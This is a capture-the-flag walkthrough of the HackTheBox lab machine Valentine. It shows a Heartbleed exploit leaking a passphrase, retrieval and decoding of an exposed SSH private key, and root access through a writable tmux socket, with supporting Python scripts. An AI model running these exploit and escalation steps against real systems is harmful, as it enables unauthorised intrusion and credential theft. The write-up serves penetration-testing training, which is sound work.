Valentine HackTheBox WalkThrough

This is the Valentine HackTheBox machine walkthrough, the 19th machine in our OSCP-like HTB Boxes series. In this writeup I demonstrate step by step how I rooted the Valentine HackTheBox machine. Before diving into the hacking part, a few facts about the box: it is a Linux machine with IP address 10.10.10.79, and its maker rated it easy. Since this machine is retired on the HackTheBox platform you will need a VIP subscription at hackthebox.eu to access it. First connect your Kali/Parrot machine to the HackTheBox VPN and confirm connectivity by pinging 10.10.10.79. If that works, start hacking. As usual I started by scanning the machine with Nmap. Scanning gives us an idea of how to proceed: it finds open and closed ports and reports the services running on them. I used Nmap for this task and the result is given below:
Scanning
$ sudo nmap -sC -sV -oA nmap/valentine 10.10.10.79

Nmap found ports 22, 80 and 443 open: OpenSSH 5.9p1 on port 22, an Apache web server on port 80 and the same Apache over SSL/TLS on port 443. The ssl-cert script also reported the hostname in the certificate's common name, valentine.htb. Before visiting the website at http://10.10.10.79 let us add the line 10.10.10.79 valentine.htb to the hosts file of our machine; if the server uses name-based virtual hosting, requesting the site by that name may give us a different website to enumerate. The hosts file is /etc/hosts.
Hosts File After Modification
$ cat /etc/hosts

Visiting http://valentine.htb shows an image of a screaming woman next to the Heartbleed logo, a bleeding heart. This is a strong hint that the TLS service on this host is vulnerable to Heartbleed (CVE-2014-0160). If you don't know about the Heartbleed vulnerability, check the official page of the company that first disclosed it and gave it its name and logo.


Let us confirm whether this machine is actually vulnerable to Heartbleed. There are multiple ways to do this: the Nmap script ssl-heartbleed.nse, the Metasploit scanner module auxiliary/scanner/ssl/openssl_heartbleed, or one of the many standalone tools on GitHub (search for "Heartbleed exploit GitHub" and you will find plenty). I used both the Nmap script and the Metasploit module to confirm the vulnerability.
Confirming Heartbleed Vulnerability using Nmap Script
$ nmap -p 443 --script ssl-heartbleed.nse 10.10.10.79

Confirming Heartbleed Vulnerability using Metasploit
msf6 > search openssl_heartbleed
msf6 > use auxiliary/scanner/ssl/openssl_heartbleed
msf6 auxiliary(scanner/ssl/openssl_heartbleed) > set RHOSTS 10.10.10.79
msf6 auxiliary(scanner/ssl/openssl_heartbleed) > set RPORT 443
msf6 auxiliary(scanner/ssl/openssl_heartbleed) > set action SCAN
msf6 auxiliary(scanner/ssl/openssl_heartbleed) > run

Both methods confirmed that Valentine is vulnerable to Heartbleed. Let us exploit it and see what the server leaks from its process memory. I used the GitHub gist below (a Python script); any similar tool will do.
Exploiting Heartbleed Vulnerability
$ git clone https://gist.github.com/eelsivart/10174134
$ cd 10174134/
$ python heartbleed.py 10.10.10.79

The leaked memory contained a base64-encoded string. Decoding it gives heartbleedbelievethehype. I did not know yet what it was, possibly someone's password, so I added it to my CherryTree notes; it will be useful as soon as we find a username to try it against, for example over SSH.
$ echo 'aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==' | base64 -d
heartbleedbelievethehype

After more enumeration at https://valentine.htb turned up nothing interesting, I ran a directory brute force with dirsearch (a directory brute forcer written in Python) using its default wordlist and excluding 400 and 403 responses:
$ sudo dirsearch -e all -t 30 -x 400,403 -u https://valentine.htb | tee dirsearch.out

Directory brute forcing revealed a dev folder. At https://valentine.htb/dev/ I found a file hype_key whose content is hex encoded. It can be fetched directly from https://valentine.htb/dev/hype_key.

Let us decode this key.

Decoding the hex gives an RSA private key in PEM format, which I saved to a file hype_key.pem. Judging by its name the key belongs to a user called hype. The key is passphrase-protected, and the string we noted earlier, heartbleedbelievethehype, turned out to be its passphrase: SSH as hype with the key and that passphrase logs in straight away. So our SSH credentials are user hype with the hype_key private key and passphrase heartbleedbelievethehype.
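The decoding step above, as an added example rather than the author's command: it turns the hex file into bytes, writes it with the 0400 mode ssh insists on, and reports whether the PEM carries the legacy Proc-Type/DEK-Info headers, which is how you know in advance that ssh will ask for a passphrase and that the Heartbleed string is worth trying there. SAMPLE_PEM is a constructed stub (header, encrypted-key preamble, junk body), not the real hype_key, and the whitespace-separated hex layout is an assumption.

```python
"""Decode a hex-encoded private key and say what kind of PEM it is: an added
example, not the author's steps. SAMPLE_PEM is a constructed stub, not the real
hype_key, so it cannot be used to log in anywhere."""
import os
import re
import sys

def hex_to_bytes(text):
    """Plain hex; whitespace between byte pairs (as in many hex dumps) is tolerated."""
    return bytes.fromhex(re.sub(r"\s+", "", text))

def inspect_pem(blob):
    """Return {'type', 'encrypted', 'cipher'} for a PEM blob, or None if it is not PEM.
    'encrypted' means the legacy OpenSSL Proc-Type/DEK-Info headers are present, so
    ssh will prompt for a passphrase before the key can be used."""
    text = blob.decode("ascii", errors="replace")
    begin = re.search(r"-----BEGIN ([A-Z ]+?)-----", text)
    if not begin or ("-----END %s-----" % begin.group(1)) not in text:
        return None
    dek = re.search(r"DEK-Info: ([A-Za-z0-9-]+),([0-9A-Fa-f]+)", text)
    return {"type": begin.group(1),
            "encrypted": "Proc-Type: 4,ENCRYPTED" in text,
            "cipher": dek.group(1) if dek else None}

def decode_key(hex_text, out_path=None):
    """Decode the hex; optionally write the PEM with mode 0400, which ssh requires."""
    blob = hex_to_bytes(hex_text)
    if out_path:
        with open(out_path, "wb") as fh:
            fh.write(blob)
        os.chmod(out_path, 0o400)
    return inspect_pem(blob)

# Constructed sample: the shape of an OpenSSL-encrypted RSA key, with a junk body.
SAMPLE_PEM = (b"-----BEGIN RSA PRIVATE KEY-----\n"
              b"Proc-Type: 4,ENCRYPTED\n"
              b"DEK-Info: AES-128-CBC,00000000000000000000000000000000\n\n"
              b"AAAAAAAAAAAAAAAAAAAA\n"
              b"-----END RSA PRIVATE KEY-----\n")
SAMPLE_HEX = " ".join("%02x" % b for b in SAMPLE_PEM)     # hex pairs separated by spaces

if __name__ == "__main__":                                  # python3 decode_key.py hype_key hype_key.pem
    with open(sys.argv[1]) as fh:
        print(decode_key(fh.read(), sys.argv[2] if len(sys.argv) > 2 else None))
```

When the result says encrypted, you can test a passphrase candidate offline with ssh-keygen -y -f hype_key.pem (it prompts and prints the public key only if the passphrase is right) instead of generating failed logins on the target.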
Getting User Shell
$ vi hype_key.pem
$ chmod 400 hype_key.pem
$ ssh -i hype_key.pem hype@10.10.10.79
Enter passphrase for key 'hype_key.pem': heartbleedbelievethehype
hype@Valentine:~$ whoami && id

We have a shell as hype. Let us capture the user flag.
Capture User Flag
$ cat Desktop/user.txt

Privilege Escalation
To escalate privileges to root we first need a privilege escalation vector. For this I ran linpeas.sh (a post-exploitation enumeration script), which lists the potential paths for escalation it finds on the host.
Finding PrivEsc Vector
Linpeas found a tmux session: a tmux server running as root with its socket at /.devs/dev_sess, and the permissions on that socket allow hype to connect to it. Running /usr/bin/tmux -S /.devs/dev_sess attaches to that server and drops us straight into root's shell. So our privilege escalation vector is attaching to root's tmux session through its exposed socket.
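The check behind that finding, as an added example that is not linpeas code: tmux -S talks to whichever server owns the socket, and connecting to an AF_UNIX socket needs write permission on the socket inode, so a root-owned socket that another user can write to is exactly the condition to look for. The scanner below walks the filesystem for sockets owned by someone else that the current user may write to; the demo() fixture is constructed (a socket named like the one on this box, created in a temp directory) and the euid override exists only so the fixture can stand in for hype looking at root's socket.

```python
"""Find unix-domain sockets owned by another user that we may connect to, the
condition behind the tmux escalation on this box. Added example, not linpeas
code; demo() builds a constructed fixture, it does not touch /.devs."""
import os
import pwd
import shutil
import socket
import stat
import tempfile

def connectable_sockets(roots, euid=None, skip=("/proc", "/sys", "/dev")):
    """[(path, owner_name)] for sockets not owned by euid that the current process
    may write to; os.access honours group membership and ACLs, which is what
    matters since connect() on AF_UNIX is checked like a write to the inode."""
    euid = os.geteuid() if euid is None else euid
    hits = []
    for root in roots:
        for dirpath, dirnames, filenames in os.walk(root, onerror=lambda _e: None):
            if dirpath.startswith(skip):
                dirnames[:] = []                              # pseudo-filesystems: skip
                continue
            for name in filenames:                            # os.walk lists sockets here
                path = os.path.join(dirpath, name)
                try:
                    st = os.lstat(path)
                except OSError:
                    continue
                if stat.S_ISSOCK(st.st_mode) and st.st_uid != euid and os.access(path, os.W_OK):
                    try:
                        owner = pwd.getpwuid(st.st_uid).pw_name
                    except KeyError:
                        owner = str(st.st_uid)
                    hits.append((path, owner))
    return hits

def demo():
    """Constructed fixture: bind a socket named dev_sess in a temp dir, scan it
    once as ourselves (ignored: we own it) and once pretending to be another uid
    (found: owned by someone else, writable by us, as root's socket was for hype)."""
    tmp = tempfile.mkdtemp()
    path = os.path.join(tmp, "dev_sess")
    srv = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    try:
        srv.bind(path)
        as_owner = connectable_sockets([tmp])
        as_other = connectable_sockets([tmp], euid=os.geteuid() + 1)
    finally:
        srv.close()
        shutil.rmtree(tmp, ignore_errors=True)
    return as_owner, [p for p, _ in as_other]

if __name__ == "__main__":
    for path, owner in connectable_sockets(["/"]):
        print("%s (owner %s): try tmux -S %s" % (path, owner, path))
```

A hit is only a tmux escalation if a tmux server is actually listening on it; for any other daemon the same writable socket is still worth a look, since whatever protocol it speaks now runs with the daemon's privileges on your behalf.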

Getting Root Shell
$ /usr/bin/tmux -S /.devs/dev_sess

Capture Root Flag
# cat /root/root.txt

This was how I rooted the Valentine HackTheBox machine. I hope you learned something from this walkthrough. Feel free to ask in the comments if anything is unclear. Thanks for reading this article. For any query or suggestion related to the walkthrough, contact us at [email protected].